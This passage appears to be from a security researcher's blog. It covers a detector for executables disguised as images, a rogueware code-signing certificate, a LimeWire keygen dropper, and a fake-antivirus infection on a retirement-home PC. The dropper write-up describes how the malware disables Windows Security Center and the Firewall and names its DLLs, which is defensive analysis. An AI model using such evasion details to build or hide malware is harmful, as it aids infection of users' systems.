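    for url in flag_downloads(SAMPLE_DOWNLOADS):
        print("executable disguised as image:", url)
```

A filter that only looks at the request line will pass these through, which is the point the post makes; a proxy that sniffs the first bytes of the response catches the swap regardless of the file name.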



Interestingly, amongst the AntiVirus 2009 and ProAntiSpyware rogueware component downloads, a valid digital certificate popped up from "AntiSpywareSolutionsPro, Inc" out of Belize City, Belize for a "VirusRemover2008" component.



So, we can see who provided the certificate, the next question is why. Can some of the most prevalent rogueware groups on the internet continue to get valid digital certs from trusted providers? Next, will the Rustock, Coreflood and Storm groups have digitally signed certs for secure botnet sessions?

Crack.exe

If you find yourself installing and running cracks and keygens that you're downloading over LimeWire, stop what you're doing. First, stop using cracks and pirated software. Second, nothing truly is free.

LimeWire users have been seeing various keygens offered over their P2P connections. Over the past few days, there have been multiple releases of AVG LICENSE KEY CRACK BY [SSG].ZIP, HALO KEYGEN BY [ZWT].ZIP, REALTEK AUDIO DRIVER CRACKED BY -=ROGUE=-.ZIP, and NERO 9 NO PATENT CRACK BY ZWT.ZIP. And surprise, surprise, all of these files come with a little treat inside, crack.exe. We've seen this sort of keygen package bundled with some severe malware in the past, and we continue to see downloaders and adware installed by this stuff.

Taking a quick look, we find that this dropper will disable the Windows Security Center and Firewall. It will then scan through the system32 directory, attempting to find a random dll name string to borrow from, and then select some digits from the system time to create its dropped dll name string, always ending with "32.dll". For our ThreatExpert report, the malicious downloader file name created was "glu3232.dll", and we can identify pieces of the code used to create a random portion of the name here:


and the concatenation of that semi-randomized string with "32.dll" here:

Monday, December 1, 2008

Retirement Community Computers, brastk.exe and AntiVirus 2009

Malware shows up in the most unexpected places. One of my previous colleagues regularly considered the idea of computer infections ridiculous, but wired Windows systems really are ubiquitous. And this last week's Thanksgiving trip provided another location to observe computer malware affecting unsuspecting Windows users.

This year's birthday celebration for our 92-year old grandmother was fantastic at her new home. Singing, dessert, multiple generations of our family were together for the holiday and grandma was in a great mood in her new digs.

In the meantime, a few of us celebrants, full of pizza and cake, left the party to check out the community building -- the pool table on the fourth floor, pianos on the first. After knocking an 8ball around the pool table at 8 p.m. in the relative quiet of the home, we noticed a computer center along the way back to the elevators. The monitors in that center could not have displayed a more disappointing screen.
Next to a little "M" square in the system tray (a competing AV product that will remain nameless here) was a large red circle with a white X through it and a familiar fakealert bubble caption containing a frightening message about an infection and loss of privacy: "Privacy Violation Alert! Antivirus 2009 detected a Privacy Violation".



A quick look at the registry and taskman showed a spambot, the brastk.exe fakealert downloader, AntiVirus 2009, and a vundo component all installed and running. The brastk.exe downloader, one of the most familiar fakealert components that is being prevented in the ThreatFire community, was running full bore. And the Vundo dll locked up the CPU from within the explorer process. Add a half dozen ads open in half a dozen hung Internet Explorer windows, and the system was unusable.
There were various poker game shortcuts on the desktop, so I'm guessing that one of the senior citizens looking to play a game mistakenly installed a package of malware on the system, assuming that the free software game was innocent and the system was protected.
For a group of elderly people who don't know much about technology but want to use it, this is very disappointing and discouraging.

Along those lines, the recent unusual and severe Mytob infection bringing down several British hospitals (the London Chest Hospital, the Royal London Hospital and St Bartholomew's) highlights the need for layered security as well. Malware is as ubiquitous as the PC itself.